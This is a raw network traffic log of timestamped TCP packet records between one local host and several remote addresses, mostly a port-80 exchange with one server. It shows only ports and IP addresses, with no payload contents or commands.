Nov 11, 2024 10:33:23.786410093 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.786431074 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.786458015 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.786489010 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.786500931 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.786516905 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.786529064 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.786539078 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.786540031 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.786552906 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.786571980 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.786581993 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.786633015 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.786649942 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.786662102 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.786672115 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.786674023 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.786701918 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.786725998 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.786771059 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.786782980 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.786792994 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.786803961 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.786813974 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.786827087 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.786833048 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.786864042 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.786912918 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.786922932 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.786933899 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.786946058 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.786959887 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.786967993 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.786973000 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.786978006 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.786987066 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.786999941 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.787036896 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.787041903 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.787050962 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.787061930 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.787072897 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.787091017 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.787115097 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.787168980 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.787182093 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.787229061 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.794382095 CET	49807	443	192.168.2.5	20.1.248.118
Nov 11, 2024 10:33:23.794395924 CET	443	49807	20.1.248.118	192.168.2.5
Nov 11, 2024 10:33:23.795465946 CET	443	49807	20.1.248.118	192.168.2.5
Nov 11, 2024 10:33:23.795670033 CET	49807	443	192.168.2.5	20.1.248.118
Nov 11, 2024 10:33:23.799268007 CET	49807	443	192.168.2.5	20.1.248.118
Nov 11, 2024 10:33:23.799339056 CET	443	49807	20.1.248.118	192.168.2.5
Nov 11, 2024 10:33:23.803330898 CET	49807	443	192.168.2.5	20.1.248.118
Nov 11, 2024 10:33:23.803338051 CET	443	49807	20.1.248.118	192.168.2.5
Nov 11, 2024 10:33:23.809573889 CET	443	49799	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.809926033 CET	443	49799	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.810077906 CET	49799	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.810631037 CET	49799	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.810651064 CET	443	49799	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.810663939 CET	49799	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.810669899 CET	443	49799	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.814608097 CET	49816	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.814624071 CET	443	49816	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.814786911 CET	49816	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.814924002 CET	443	49802	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.814977884 CET	443	49802	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.815016985 CET	49802	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.815210104 CET	49816	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.815222025 CET	443	49816	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.815448999 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.815463066 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.815474033 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.815490007 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.815509081 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.815525055 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.815530062 CET	49802	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.815530062 CET	49802	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.815548897 CET	443	49802	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.815567017 CET	443	49802	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.815932989 CET	443	49801	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.816198111 CET	443	49801	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.816248894 CET	49801	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.816284895 CET	443	49800	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.816644907 CET	49801	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.816673994 CET	443	49801	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.816688061 CET	49801	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.816692114 CET	443	49801	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.817338943 CET	443	49800	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.817804098 CET	49817	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.817840099 CET	443	49817	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.817842007 CET	49800	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.817899942 CET	49817	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.817997932 CET	49817	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.818022013 CET	443	49817	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.819852114 CET	49800	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.819852114 CET	49800	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.819864988 CET	443	49800	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.819869995 CET	443	49800	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.822680950 CET	443	49798	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.822844982 CET	443	49798	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.822956085 CET	49798	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.823602915 CET	443	49808	23.200.0.34	192.168.2.5
Nov 11, 2024 10:33:23.826270103 CET	49808	443	192.168.2.5	23.200.0.34
Nov 11, 2024 10:33:23.826291084 CET	443	49808	23.200.0.34	192.168.2.5
Nov 11, 2024 10:33:23.826925993 CET	49818	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.826939106 CET	443	49818	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.827357054 CET	443	49808	23.200.0.34	192.168.2.5
Nov 11, 2024 10:33:23.827383995 CET	49818	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.827393055 CET	49798	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.827393055 CET	49798	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.827403069 CET	443	49798	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.827408075 CET	443	49798	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.827414036 CET	49808	443	192.168.2.5	23.200.0.34
Nov 11, 2024 10:33:23.827414036 CET	49818	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.827419043 CET	443	49818	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.829179049 CET	49808	443	192.168.2.5	23.200.0.34
Nov 11, 2024 10:33:23.829247952 CET	443	49808	23.200.0.34	192.168.2.5
Nov 11, 2024 10:33:23.829336882 CET	49808	443	192.168.2.5	23.200.0.34
Nov 11, 2024 10:33:23.830002069 CET	49819	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.830029011 CET	443	49819	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.830486059 CET	49820	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.830518961 CET	443	49820	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.830542088 CET	49819	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.830589056 CET	49820	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.830674887 CET	49819	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.830688000 CET	443	49819	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.830776930 CET	49820	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.830787897 CET	443	49820	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.847119093 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.847140074 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.847148895 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.847181082 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.847193003 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.847198009 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.847207069 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.847228050 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.847260952 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.847307920 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.847332001 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.847345114 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.847353935 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.847357035 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.847382069 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.847393990 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.847394943 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.847404957 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.847417116 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.847428083 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.847429991 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.847440004 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.847450972 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.847456932 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.847465992 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.847480059 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.847496986 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.847510099 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.847522020 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.847527027 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.847548962 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.847551107 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.847565889 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.847582102 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.847590923 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.847590923 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.847590923 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.847592115 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.847608089 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.847618103 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.847630024 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.847634077 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.847654104 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.847666025 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.847666025 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.847685099 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.847696066 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.847714901 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.847716093 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.847738028 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.847743034 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.847783089 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.847786903 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.847796917 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.847826004 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.847851992 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.847968102 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.847979069 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.847990036 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.848000050 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.848021030 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.848031044 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.848038912 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.848045111 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.848052025 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.848078966 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.848079920 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.848102093 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.848104954 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.848118067 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.848128080 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.848129988 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.848140001 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.848148108 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.848153114 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.848162889 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.848165989 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.848205090 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.848212004 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.848222971 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.848233938 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.848246098 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.848257065 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.848268986 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.848278046 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.848301888 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.848301888 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.848320961 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.848334074 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.848351002 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.848361969 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.848372936 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.848383904 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.848396063 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.848427057 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.848458052 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.848469973 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.848484993 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.848495960 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.848516941 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.848517895 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.848530054 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.848540068 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.848543882 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.848562002 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.848562956 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.848581076 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.848592043 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.848592043 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.848603964 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.848618984 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.848629951 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.848639011 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.848642111 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.848679066 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.848710060 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.848721981 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.848732948 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.848753929 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.848778963 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.848782063 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.848798037 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.848810911 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.848833084 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.848843098 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.848850965 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.848854065 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.848875999 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.848882914 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.848896980 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.848907948 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.848913908 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.848938942 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.848958969 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.848994970 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.849004984 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.849016905 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.849033117 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.849047899 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.849061966 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.849069118 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.849075079 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.849087000 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.849101067 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.849132061 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.849164963 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.849175930 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.849188089 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.849198103 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.849222898 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.849245071 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.849257946 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.849271059 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.849282980 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.849293947 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.849297047 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.849304914 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.849327087 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.849334002 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.849355936 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.849374056 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.849381924 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.849385023 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.849397898 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.849436998 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.849479914 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.849492073 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.849503040 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.849515915 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.849524975 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.849559069 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.849611044 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.849622965 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.849634886 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.849646091 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.849656105 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.849661112 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.849678993 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.849698067 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.849708080 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.849719048 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.849740028 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.849767923 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.849780083 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.849858999 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.849869967 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.849899054 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.849911928 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.849921942 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.849948883 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.849950075 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.849961042 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.849972963 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.849977970 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.849983931 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.849996090 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.850002050 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.850011110 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.850014925 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.850027084 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.850038052 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.850049019 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.850049973 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.850060940 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.850086927 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.850096941 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.850100040 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.850109100 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.850126982 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.850135088 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.850147009 CET	80	49747	185.215.113.206	192.168.2.5
